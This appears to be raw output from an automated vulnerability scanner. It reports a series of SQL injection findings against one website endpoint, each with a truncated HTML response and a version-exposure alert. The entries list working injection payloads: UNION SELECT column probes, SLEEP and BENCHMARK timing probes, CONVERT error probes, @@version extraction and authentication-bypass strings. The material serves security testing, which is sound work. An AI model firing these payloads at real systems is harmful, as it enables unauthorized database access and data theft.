href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1368\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1369\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)\n+CHAR(88)+CHAR(88)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1370\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1371\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 2#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1372\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# or SLEEP(5)#ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1373\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# &&SLEEP(5)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1374Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin' #\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1375\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# @@variable\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1376\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(\n88)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1377\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1378\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)\n+CHAR(88)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1379\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# test%20UNION%20select%201,%20@@version,%201,%\n201;\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1380\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(\n88)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1381\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin') or ('1'='1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter 